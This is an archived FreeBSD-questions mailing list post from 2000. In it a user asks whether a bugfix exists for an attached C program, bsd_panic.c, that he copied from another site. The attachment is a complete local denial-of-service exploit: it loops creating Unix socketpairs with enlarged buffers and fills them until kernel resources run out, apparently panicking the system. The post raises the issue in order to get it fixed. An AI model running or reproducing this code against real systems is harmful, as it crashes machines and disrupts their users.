Skip site navigation (1)Skip section navigation (2)
Date:      Mon, 05 Jun 2000 21:30:21 -0300
From:      Gustavo Vieira Goncalves Coelho Rios <kernel@tdnet.com.br>
To:        questions@freebsd.org
Subject:   is there a bugfix for the following attach ?
Message-ID:  <393C461D.DCA642C3@tdnet.com.br>

next in thread | raw e-mail | index | archive | help
This is a multi-part message in MIME format.
--------------9B5C5252AE334355DB74927E
Content-Type: text/plain; charset=us-ascii
Content-Transfer-Encoding: 7bit

Is not mine! I cat-and-paste from a BR site: www.securenet.com.br!


-- 
Your mouse has moved.
Windows NT must be restarted for the change to take effect!

Reboot now?   [ OK]
--------------9B5C5252AE334355DB74927E
Content-Type: text/plain; charset=us-ascii;
 name="bsd_panic.c"
Content-Transfer-Encoding: 7bit
Content-Disposition: inline;
 filename="bsd_panic.c"

#include        <unistd.h>
#include        <sys/socket.h>
#include        <fcntl.h> 
        
#define         BUFFERSIZE      204800

extern  int
main(void)
{
        int             p[2], i;
        char            crap[BUFFERSIZE]; 

        while (1)
        {
                if (socketpair(AF_UNIX, SOCK_STREAM, 0, p) == -1)
                        break;
                i = BUFFERSIZE;
                setsockopt(p[0], SOL_SOCKET, SO_RCVBUF, &i,
sizeof(int));
                setsockopt(p[0], SOL_SOCKET, SO_SNDBUF, &i, 
sizeof(int));
                setsockopt(p[1], SOL_SOCKET, SO_RCVBUF, &i,
sizeof(int));   
                setsockopt(p[1], SOL_SOCKET, SO_SNDBUF, &i,
sizeof(int));
                fcntl(p[0], F_SETFL, O_NONBLOCK);
                fcntl(p[1], F_SETFL, O_NONBLOCK);
                write(p[0], crap, BUFFERSIZE);
                write(p[1], crap, BUFFERSIZE);
        }
        exit(0);
}       

--------------9B5C5252AE334355DB74927E--



To Unsubscribe: send mail to majordomo@FreeBSD.org
with "unsubscribe freebsd-questions" in the body of the message




Want to link to this message? Use this URL: <https://mail-archive.FreeBSD.org/cgi/mid.cgi?393C461D.DCA642C3>